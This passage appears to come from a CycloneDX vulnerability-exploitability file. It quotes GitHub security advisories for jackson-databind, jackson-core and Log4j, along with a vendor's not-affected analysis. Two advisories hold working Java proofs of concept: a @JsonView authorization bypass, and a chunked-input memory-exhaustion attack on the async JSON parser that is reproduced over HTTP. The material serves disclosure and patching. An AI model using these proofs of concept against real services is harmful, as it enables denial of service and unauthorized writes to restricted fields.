creator branch.\n\n  Proof of Concept\n\n  Compiles and runs against jackson-databind 2.21.4:\n \n```java\n  import com.fasterxml.jackson.annotation.*;\n  import com.fasterxml.jackson.databind.ObjectMapper;\n\n  public class JsonViewExternalTypeIdBypass {\n      public static class PublicView {}\n      public static class AdminView extends PublicView {}\n\n      public static abstract class Asset { public String name; }\n      public static class PublicAsset extends Asset {}\n      public static class AdminAsset extends Asset { public String secret; }\n\n      public static class Container {\n          @JsonTypeInfo(use = JsonTypeInfo.Id.NAME,\n                  include = JsonTypeInfo.As.EXTERNAL_PROPERTY,\n                  property = \"kind\")\n          @JsonSubTypes({\n              @JsonSubTypes.Type(value = PublicAsset.class, name = \"pub\"),\n              @JsonSubTypes.Type(value = AdminAsset.class,  name = \"admin\")\n          })\n          @JsonView(AdminView.class)\n          public Asset asset;\n\n          public String label;\n\n          @JsonCreator\n          public Container(\n                  @JsonProperty(\"label\") String label,\n                  @JsonProperty(\"asset\") @JsonView(AdminView.class) Asset asset) {\n              this.label = label;\n              this.asset = asset;\n          }\n      }\n\n      public static class Wrapper {\n          @JsonView(PublicView.class)\n          public Container data;\n      }\n\n      public static void main(String[] args) throws Exception {\n          // Admin-only \"asset\" should be blocked when reading with PublicView\n          String json = \"{\\\"data\\\":{\\\"label\\\":\\\"hello\\\",\\\"kind\\\":\\\"admin\\\",\"\n                      + \"\\\"asset\\\":{\\\"name\\\":\\\"foo\\\",\\\"secret\\\":\\\"LEAKED\\\"}}}\";\n\n          ObjectMapper om = new ObjectMapper();\n          Wrapper r = om.readerWithView(PublicView.class)\n                  .forType(Wrapper.class)\n                  .readValue(json);\n\n          System.out.println(r.data);\n          // Actual on 2.21.4:   Container{label='hello', asset=AdminAsset{name='foo', secret='LEAKED'}}\n          // Expected (secure):  Container{label='hello', asset=null}\n          if (r.data.asset != null && r.data.asset instanceof AdminAsset) {\n              System.out.println(\"[!!] BYPASS CONFIRMED \u2014 admin-only asset populated under PublicView\");\n          }\n      }\n  }\n```\n\nA control case that removes include = As.EXTERNAL_PROPERTY (forcing the normal property-based path) correctly returns asset = null, confirming the bypass is specific to the ExternalTypeId\n  code path and not a misconfiguration.\n\n### Impact\n\n  View-restricted (e.g. admin-only) creator properties can be populated from untrusted input where @JsonView is used as a write-side authorization boundary. Typical victims are Spring Boot\n  REST controllers that use @JsonView(PublicView.class) on the request body to whitelist user-settable fields \u2014 an attacker can inject the restricted creator parameter (including choosing\n  the polymorphic subtype via the sibling kind/type-id property) by combining it with a polymorphic @JsonTypeInfo(EXTERNAL_PROPERTY) annotation on the same field.\n\n- CWE-863 (Incorrect Authorization)\n- Same impact class as CVE-2026-54517 / CVE-2026-54518\n- No RCE, no DoS \u2014 this is an access-control / mass-assignment bypass\n\n### Trigger Conditions\n\nDeveloper code must combine (no opt-in user configuration required):\n\n1. Property-based @JsonCreator on the outer type\n2. A creator parameter annotated with @JsonView(RestrictedView.class)\n3. The same parameter annotated with @JsonTypeInfo(use=Id.NAME, include=As.EXTERNAL_PROPERTY, property=\"...\")",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.9, 2.21.5",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-mhm7-754m-9p8w"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/c628b357ed143d8492756d5c1458cfb9fbeb29ed"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/dea7eb466e98cc226c4ac65587581fb49926820c"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-mhm7-754m-9p8w"
        }
      ],
      "published": "2026-07-21T19:40:12+00:00",
      "updated": "2026-07-21T19:40:12+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2",
          "versions": [
            {
              "version": "2.21.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a6beed9c-6ff1-4b5c-893e-cff8f44e2bc1/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#ed39dfdb-395c-4d98-a3f6-f3bbae960502"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a87f064b-ed47-4786-b3b6-55b4d706f212/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#8a946054-d4de-4fae-be17-c8def7953482"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#e272d2d7-ad51-44fe-ad2f-78acb7605ccc"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#e1daa1f8-3fbc-466d-bdfa-3606171f026b"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#27722e9c-480d-463c-9471-3e28fff661ce"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#d1a8375b-7e80-4a4b-9a19-e5181eec10bb"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#c2d8b33e-2a7c-4028-9a5f-d0a149bf6a68"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#91781c8e-7326-4ffd-aa21-e9a4bed6aa64"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#f9bc8a73-638a-436a-b948-1b57cd1a3738"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#0df291d2-a463-48a8-8a00-212c73132383"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c59920ed-da76-4143-86fb-af4890d96240"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#fe3ca0fc-606d-4691-9791-677398b734ba"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#3b2fc3d8-256a-4379-8c7a-46bfd2080520"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "GHSA-r7wm-3cxj-wff9",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [],
      "description": "## Summary\n\nThe fix released in jackson-core `2.18.6` and `2.21.1` for [GHSA-72hv-8253-57qq](https://github.com/FasterXML/jackson-core/security/advisories/GHSA-72hv-8253-57qq) (Number Length Constraint Bypass in Async Parser, published 2026-02-28) is incomplete. The fix commit `b0c428e6` (#1555) wired `validateIntegerLength` into a new `_setIntLength` helper and called it at every place where the integer portion of a number is *decided* (terminator byte arrived, `.` / `e/E` seen, end-of-feed inside a fully-buffered value). It did not call it on the much more attacker-relevant path: \"ran out of input while still inside `MINOR_NUMBER_INTEGER_DIGITS`, return `NOT_AVAILABLE` to caller\".\n\nAs a result, an attacker who streams JSON to a non-blocking parser in many small chunks, without ever sending a terminator byte, can keep the parser inside `MINOR_NUMBER_INTEGER_DIGITS` indefinitely. `_textBuffer.expandCurrentSegment()` grows on every chunk, and `validateIntegerLength` is never invoked. The accumulator is only gated by `maxStringLength` (20 MiB default) \u2014 a **~20,000x amplification** of the documented `maxNumberLength` (1000 default).\n\nThis is the same vulnerability class, same advisory wording (\"Memory Exhaustion: Unbounded allocation in TextBuffer from excessively long numbers\"), same parser class \u2014 just the streaming path the original fix didn't cover. The fix to the *fraction* path is correct (see `_finishFloatFraction` at line 1834-1837 of `NonBlockingUtf8JsonParserBase.java` in 2.18.6, where `_setFractLength(fractLen)` IS called before the `NOT_AVAILABLE` return); the equivalent call is missing from every integer-digit path.\n\n## Affected versions\n\nVerified on the patched releases:\n- `com.fasterxml.jackson.core:jackson-core` **2.18.6**\n- `com.fasterxml.jackson.core:jackson-core` **2.21.1**\n\nStructurally identical code in `tools.jackson.core` 3.0.x / 3.1.x \u2014 same `NonBlockingUtf8JsonParserBase` class, same `_setIntLength` rollout, same NOT_AVAILABLE returns without validation. Not retested but presumed vulnerable.\n\n## Affected code\n\n[`src/main/java/com/fasterxml/jackson/core/json/async/NonBlockingUtf8JsonParserBase.java`](https://github.com/FasterXML/jackson-core/blob/b0c428e6/src/main/java/com/fasterxml/jackson/core/json/async/NonBlockingUtf8JsonParserBase.java) in 2.18.6 / 2.21.1.\n\n### Site 1 \u2014 `_startPositiveNumber(int ch)` lines 1320-1330:\n\n```java\nif (outPtr >= outBuf.length) {\n    // NOTE: must expand to ensure contents all in a single buffer (to keep\n    // other parts of parsing simpler)\n    outBuf = _textBuffer.expandCurrentSegment();\n}\noutBuf[outPtr++] = (char) ch;\nif (++_inputPtr >= _inputEnd) {\n    _minorState = MINOR_NUMBER_INTEGER_DIGITS;\n    _textBuffer.setCurrentLength(outPtr);\n    return _updateTokenToNA();          // <-- no validateIntegerLength(outPtr)\n}\n```\n\n### Site 2 \u2014 `_finishNumberIntegralPart` lines 1691-1727:\n\n```java\nprotected JsonToken _finishNumberIntegralPart(char[] outBuf, int outPtr) throws IOException {\n    int negMod = _numberNegative ? -1 : 0;\n\n    while (true) {\n        if (_inputPtr >= _inputEnd) {\n            _minorState = MINOR_NUMBER_INTEGER_DIGITS;\n            _textBuffer.setCurrentLength(outPtr);\n            return _updateTokenToNA();    // <-- no validateIntegerLength(outPtr + negMod)\n        }\n        int ch = getByteFromBuffer(_inputPtr) & 0xFF;\n        if (ch < INT_0) {\n            if (ch == INT_PERIOD) {\n                _setIntLength(outPtr+negMod);   // <-- validated here\n                ++_inputPtr;\n                return _startFloat(outBuf, outPtr, ch);\n            }\n            break;\n        }\n        if (ch > INT_9) {\n            if ((ch | 0x20) == INT_e) {\n                _setIntLength(outPtr+negMod);   // <-- validated here\n                ++_inputPtr;\n                return _startFloat(outBuf, outPtr, ch);\n            }\n            break;\n        }\n        ++_inputPtr;\n        if (outPtr >= outBuf.length) {\n            outBuf = _textBuffer.expandCurrentSegment();\n        }\n        outBuf[outPtr++] = (char) ch;\n    }\n    _setIntLength(outPtr+negMod);            // <-- validated here\n    _textBuffer.setCurrentLength(outPtr);\n    return _valueComplete(JsonToken.VALUE_NUMBER_INT);\n}\n```\n\nThe pattern recurs at lines 1297, 1329, 1343, 1365, 1395, 1409, 1437, 1467, 1481, 1586, 1644, 1698 \u2014 every \"ran out of input mid-integer\" exit returns to the caller without validating the accumulator length.\n\n### Compare with the fraction path that is correct\n\n`_finishFloatFraction` lines 1827-1838:\n\n```java\nwhile (loop) {\n    if (ch >= INT_0 && ch <= INT_9) {\n        ++fractLen;\n        if (outPtr >= outBuf.length) {\n            outBuf = _textBuffer.expandCurrentSegment();\n        }\n        outBuf[outPtr++] = (char) ch;\n        if (_inputPtr >= _inputEnd) {\n            _textBuffer.setCurrentLength(outPtr);\n            _setFractLength(fractLen);          // <-- VALIDATED\n            return JsonToken.NOT_AVAILABLE;\n        }\n        ch = getNextSignedByteFromBuffer();\n    }\n    ...\n}\n```\n\n## Impact\n\nReactive frameworks (Spring WebFlux / Reactor, Quarkus, Helidon, Vert.x JSON, anything wrapping `JsonFactory.createNonBlockingByteArrayParser()` or `createNonBlockingByteBufferParser()`) feed inbound HTTP/gRPC bytes to the async parser as they arrive. Operators who set `StreamReadConstraints.builder().maxNumberLength(N)` on the assumption that this caps memory per number value are not getting that guarantee in chunked-feed scenarios. The parser silently accumulates digits up to `maxStringLength` (20 MiB default) per concurrent connection. Multiply by attacker-controlled concurrency to OOM the JVM.\n\nThe synchronous parsers (`UTF8StreamJsonParser`, `ReaderBasedJsonParser`) and the async parser on *complete* input are not affected \u2014 those paths go through `_setIntLength` or `ParserBase._reportTooLongIntegral` correctly.\n\nCWE-770 (Allocation of Resources Without Limits or Throttling), CVSS roughly the same as the parent advisory (Network / Low complexity / High availability impact). The parent advisory was scored CVSS 8.7 High.\n\n## Proof of concept\n\nStandalone PoC, no Maven required:\n\n```\nmkdir poc && cd poc\ncurl -sLo jackson-core-2.18.6.jar https://repo1.maven.org/maven2/com/fasterxml/jackson/core/jackson-core/2.18.6/jackson-core-2.18.6.jar\ncat > PoC.java <<'EOF'\nimport com.fasterxml.jackson.core.*;\nimport com.fasterxml.jackson.core.async.ByteArrayFeeder;\n\npublic class PoC {\n    public static void main(String[] args) throws Exception {\n        StreamReadConstraints strict = StreamReadConstraints.builder()\n                .maxNumberLength(1000)\n                .build();\n        JsonFactory f = new JsonFactoryBuilder()\n                .streamReadConstraints(strict)\n                .build();\n\n        // Sanity: synchronous parser rejects 5000-digit int.\n        try (JsonParser p = f.createParser(\"{\\\"v\\\":\" + \"1\".repeat(5000) + \"}\")) {\n            while (p.nextToken() != null) { /* drive */ }\n            System.out.println(\"[-] BUG ABSENT: sync parser accepted\");\n            return;\n        } catch (Exception e) {\n            System.out.println(\"[+] sync parser rejected 5000-digit int: \" + e.getClass().getSimpleName());\n        }\n\n        // Bug: async parser, chunked, no terminator.\n        JsonParser ap = f.createNonBlockingByteArrayParser();\n        ByteArrayFeeder feeder = (ByteArrayFeeder) ap;\n\n        byte[] preamble = \"{\\\"v\\\":\".getBytes(\"UTF-8\");\n        feeder.feedInput(preamble, 0, preamble.length);\n        while (ap.nextToken() != JsonToken.NOT_AVAILABLE) { /* drain */ }\n\n        byte[] digits = new byte[16 * 1024];\n        for (int i = 0; i < digits.length; i++) digits[i] = (byte) ('1' + (i % 9));\n\n        for (int c = 0; c < 600; c++) {\n            feeder.feedInput(digits, 0, digits.length);\n            JsonToken t = ap.nextToken();\n            if (t != JsonToken.NOT_AVAILABLE) {\n                System.out.println(\"[-] unexpected token: \" + t);\n                return;\n            }\n        }\n        System.out.println(\"[+] BUG PRESENT: async parser accepted ~9.83 MB of digits with maxNumberLength=1000\");\n\n        // Closing the number now finally triggers the validator.\n        feeder.feedInput(\"}\".getBytes(\"UTF-8\"), 0, 1);\n        feeder.endOfInput();\n        try {\n            while (ap.nextToken() != null) { /* drive */ }\n        } catch (Exception e) {\n            System.out.println(\"[*] late rejection on close: \" + e.getMessage().split(\"\\n\")[0]);\n        }\n        ap.close();\n    }\n}\nEOF\njavac -cp jackson-core-2.18.6.jar PoC.java\njava -Xmx256m -cp jackson-core-2.18.6.jar:. PoC\n```\n\nObserved output against `jackson-core-2.18.6`:\n\n```\n[+] sync parser rejected 5000-digit int: StreamConstraintsException\n[+] BUG PRESENT: async parser accepted ~9.83 MB of digits with maxNumberLength=1000\n[*] late rejection on close: Number value length (9830400) exceeds the maximum allowed (1000, from `StreamReadConstraints.getMaxNumberLength()`)\n```\n\nObserved output against `jackson-core-2.21.1`: identical.\n\nThe 9.83 MB figure is purely a function of the loop bound (600 chunks * 16 KiB). The actual ceiling is `maxStringLength = 20 MiB`. With the strict policy declared as `maxNumberLength = 1000`, the parser permits **9830x** more allocation than the policy allows. With `maxStringLength` left at the default 20 MiB, an attacker can drive a single connection to 40 MiB of `char[]` heap (chars are 2 bytes each) before the validator finally fires on terminator/`endOfInput()`. Multiply by concurrent connections.\n\n## End-to-end reproduction through real HTTP\n\nSupplements the standalone PoC with a running Spring Boot WebFlux server,\ndriving the same bug through the actual reactor-netty + Jackson2JsonDecoder\nstreaming-decode path that production reactive endpoints use.\n\nSetup:\n- Spring Boot 3.3.5 starter-webflux (spring-webflux 6.1.14, reactor-netty 1.1.23)\n- jackson-databind 2.17.2, jackson-core overridden:\n  - VULN run: `com.fasterxml.jackson.core:jackson-core:2.18.7` (latest published)\n  - PATCHED run: `2.18.8-SNAPSHOT` built from the fix branch\n- JVM: OpenJDK 17.0.18\n- Server `JsonFactory` configured with `StreamReadConstraints.builder().maxNumberLength(1000).build()`\n\nEndpoint under test exposes the `Flux<DataBuffer>` request body directly to\n`Jackson2JsonDecoder.decode(Flux, ResolvableType, ...)` so the parser sees one\nHTTP chunk per `feedInput` (the same pattern used for any\n`@RequestBody Flux<...>` / streaming JSON decoder in WebFlux). A raw-socket\nHTTP/1.1 chunked client streams `{\"v\":1` then 250 chunks of 200 digit bytes\neach (50,000 digits total) at 20ms intervals, then writes the closing `}`.\n\nVULN \u2014 jackson-core 2.18.7:\n```\n[VULN-SMALLCHUNK] streamed 50000 digits across 250 chunks; server still accepting\n[VULN-SMALLCHUNK] full POST sent (50000 digits). Response:\nHTTP/1.1 200 OK\nERR after 6548ms cause=com.fasterxml.jackson.core.exc.StreamConstraintsException:\n       Number value length (50000) exceeds the maximum allowed (1000, ...)\n```\nServer-side controller trace (250 DataBuffer arrivals elided):\n```\n[ctrl] DataBuffer arrived size=6   ms=39       <- '{\"v\":1'\n[ctrl] DataBuffer arrived size=200 ms=42\n...\n[ctrl] DataBuffer arrived size=199 ms=5993\n[ctrl] DataBuffer arrived size=1   ms=6518     <- closing '}'\n[ctrl] ERR after 6548ms ... Number value length (50000) exceeds ...\n```\nServer held all 50,000 digit characters in `_textBuffer` for 6.5 seconds with\n`maxNumberLength=1000` declared. The validator never fires during streaming;\nit only fires at value-completion when the closing `}` arrives.\n\nPATCHED \u2014 jackson-core 2.18.8-SNAPSHOT (fix branch):\n```\n[PATCHED-SMALLCHUNK] connection broke after 2801 digits at chunk 14: [Errno 32] Broken pipe\n[PATCHED-SMALLCHUNK] DONE: digits_sent=2801 status=connection-broke-mid-stream\n```\nServer-side controller trace:\n```\n[ctrl] DataBuffer arrived size=6   ms=129\n[ctrl] DataBuffer arrived size=200 ms=142\n[ctrl] DataBuffer arrived size=200 ms=142\n[ctrl] DataBuffer arrived size=200 ms=145\n[ctrl] DataBuffer arrived size=200 ms=146\n[ctrl] DataBuffer arrived size=200 ms=147\n[ctrl] ERR after 155ms ... Number value length (1001) exceeds the maximum allowed (1000, ...)\n```\nPatched server raises `StreamConstraintsException` at 155ms after only 5\nDataBuffers, exactly when the accumulated digit count crosses\n`maxNumberLength=1000`. The connection is reset mid-stream rather than the\nparser silently consuming the rest of the attacker's payload.\n\nSide-by-side:\n\n| Build | Chunks accepted before exception | Digits buffered | Time to detection |\n|---|---|---|---|\n| jackson-core 2.18.7 | 250 (full payload) | 50,000 (50x the configured limit) | 6,548ms \u2014 only at terminator |\n| 2.18.8-SNAPSHOT (fix branch) | 5 | 1,001 | 155ms \u2014 moment threshold crossed |\n\nNote on the default `@RequestBody Mono<JsonNode>` path: that path cannot\ndistinguish the two builds because Spring's `decodeToMono` joins all\nDataBuffers into one before parsing. The exploitable shape is the\nstreaming-decode path (`Flux<JsonNode>` / `@RequestBody Flux<...>` /\nWebSocket / SSE / any direct `decoder.decode(Flux<DataBuffer>, ...)` call),\nwhich is also what `Jackson2Tokenizer` uses for any streaming JSON\ndeserialization in WebFlux and Quarkus reactive REST.\n\n## Suggested fix\n\nMirror the pattern already used in `_finishFloatFraction`. At every site that returns `_updateTokenToNA()` (or `JsonToken.NOT_AVAILABLE`) with `_minorState = MINOR_NUMBER_INTEGER_DIGITS`, call `_setIntLength(outPtr + negMod)` first. Concretely, the diff to `NonBlockingUtf8JsonParserBase.java` would be:\n\n```diff\n     protected JsonToken _finishNumberIntegralPart(char[] outBuf, int outPtr) throws IOException {\n         int negMod = _numberNegative ? -1 : 0;\n\n         while (true) {\n             if (_inputPtr >= _inputEnd) {\n                 _minorState = MINOR_NUMBER_INTEGER_DIGITS;\n                 _textBuffer.setCurrentLength(outPtr);\n+                _streamReadConstraints.validateIntegerLength(outPtr + negMod);\n                 return _updateTokenToNA();\n             }\n```\n\nNote: `_setIntLength` itself can't be used as-is because it also assigns `_intLength`, and `_intLength` must not be set until the integer is truly complete (subsequent fraction handling reads `_intLength`). The minimal fix is to call only the validator, as shown.\n\nApply the same one-line insertion before each `return _updateTokenToNA();` that exits with `_minorState = MINOR_NUMBER_INTEGER_DIGITS`. The sites are listed above (12 lines total).\n\nAlternatively, a heavier refactor: also gate `_textBuffer.expandCurrentSegment()` calls inside the digit-accumulation loops on `outPtr < maxNumberLength` so that the validator fires at the moment the buffer would be enlarged past the limit, rather than waiting for the next chunk boundary. Either approach is sufficient.\n\n## Credit\n\nReported by `tonghuaroot` (`tonghuaroot@gmail.com`). Variant hunt against the Feb 2026 fix for GHSA-72hv-8253-57qq.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.8, 2.21.4",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-r7wm-3cxj-wff9"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/commit/050b429804dce2a7e08f0be1b0b4c3d040fdb9cd"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/commit/4cdd529749da396cc7edf6d4a2aad41d47902641"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/commit/c5941e5aae7fd5aeac55d66933cfb82b9aabeef8"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/pull/1611"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-r7wm-3cxj-wff9"
        }
      ],
      "published": "2026-07-21T21:58:53+00:00",
      "updated": "2026-08-03T20:30:41+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.21.2",
          "versions": [
            {
              "version": "2.21.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.21.2"
        },
        {
          "ref": "urn:cdx:a6beed9c-6ff1-4b5c-893e-cff8f44e2bc1/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.21.2"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#daec7051-65a1-4c33-a6dd-0e9763f87ecc"
        },
        {
          "ref": "urn:cdx:e6ff0389-7fc6-4ca4-9cdc-8f5ab42cce66/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.21.2"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.21.2"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.21.2"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.21.2"
        },
        {
          "ref": "urn:cdx:a87f064b-ed47-4786-b3b6-55b4d706f212/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.21.2"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#d9a6d62f-5970-4a73-8bbe-d49a7f070376"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.21.2"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#e600ec58-716e-46d3-93a2-f4507557bc5d"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.21.2"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.21.2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.21.2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#eba8e686-f8c2-4f99-84b5-297e9a62e500"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.21.2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#c07ecd7e-e9ed-40f2-95cc-3500b1bf1d9a"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#b5ba2c3b-e649-47aa-ba87-fde4e3ad7e92"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#b252829a-d0b6-4a69-9357-7a427cf07100"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#e6169c67-c56f-4187-8235-60d6923df4b1"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#d8820907-0f49-4360-a6d8-472e1d68799e"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#8e437871-12da-426f-bb96-1785faf78822"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#ef5c0616-7a2b-49e8-9e3c-7ff2f64de365"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#ef3b9be0-47f1-4858-bbec-e17fab0b7533"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#faef7021-eb7d-414c-b81c-06a9db67a863"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.21.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. All CP REST APIs are built on blocking Jackson deserialization; the non-blocking async parser API this issue requires is never used anywhere in the CP repo set."
      }
    },
    {
      "id": "CVE-2026-49844",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        116
      ],
      "description": "Improper encoding of non-finite floating-point values during MapMessage JSON serialization in Apache Log4j API produces output that is not valid JSON. This issue affects Apache Log4j API versions 2.13.1 through 2.25.4 and version 2.26.0.\n\nThe fix for CVE-2026-34481 did not cover all code paths: when a MapMessage contains a non-finite IEEE 754 value (NaN, Infinity, or -Infinity), MapMessage.asJson() emits the corresponding bare token. RFC 8259 does not permit these tokens, so a conformant parser rejects the resulting document.\n\nThe defect is reachable only when both of the following conditions hold:\n\n  *  The application uses the  message resolver https://logging.apache.org/log4j/2.x/manual/json-template-layout.html#event-template-resolver-message  of JsonTemplateLayout or any other layout that relies on MapMessage.asJson() or MapMessage.getFormattedMessage(new String[]{\"JSON\"}).\n  *  The application logs a MapMessage that contains an attacker-controlled floating-point value.\n\n\nAn attacker who can supply a non-finite value can cause the affected layout to emit malformed JSON, which may corrupt the enclosing log record or disrupt downstream log ingestion and parsing.\n\nUsers are advised to upgrade to Apache Log4j API 2.25.5 or 2.26.1, both of which emit RFC 8259-compliant JSON for non-finite values.",
      "recommendation": "Upgrade org.apache.logging.log4j:log4j-api to version 2.25.5, 2.26.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-49844"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-49844"
        },
        {
          "url": "https://github.com/apache/logging-log4j2"
        },
        {
          "url": "https://github.com/apache/logging-log4j2/commit/19edb23e162d6c728a8c2221a240037d389ed300"
        },
        {
          "url": "https://github.com/apache/logging-log4j2/commit/feadf8eb0b4acb6ddfa4c0ab2bbc6d88b8e12d82"
        },
        {
          "url": "https://github.com/apache/logging-log4j2/pull/4163"
        },
        {
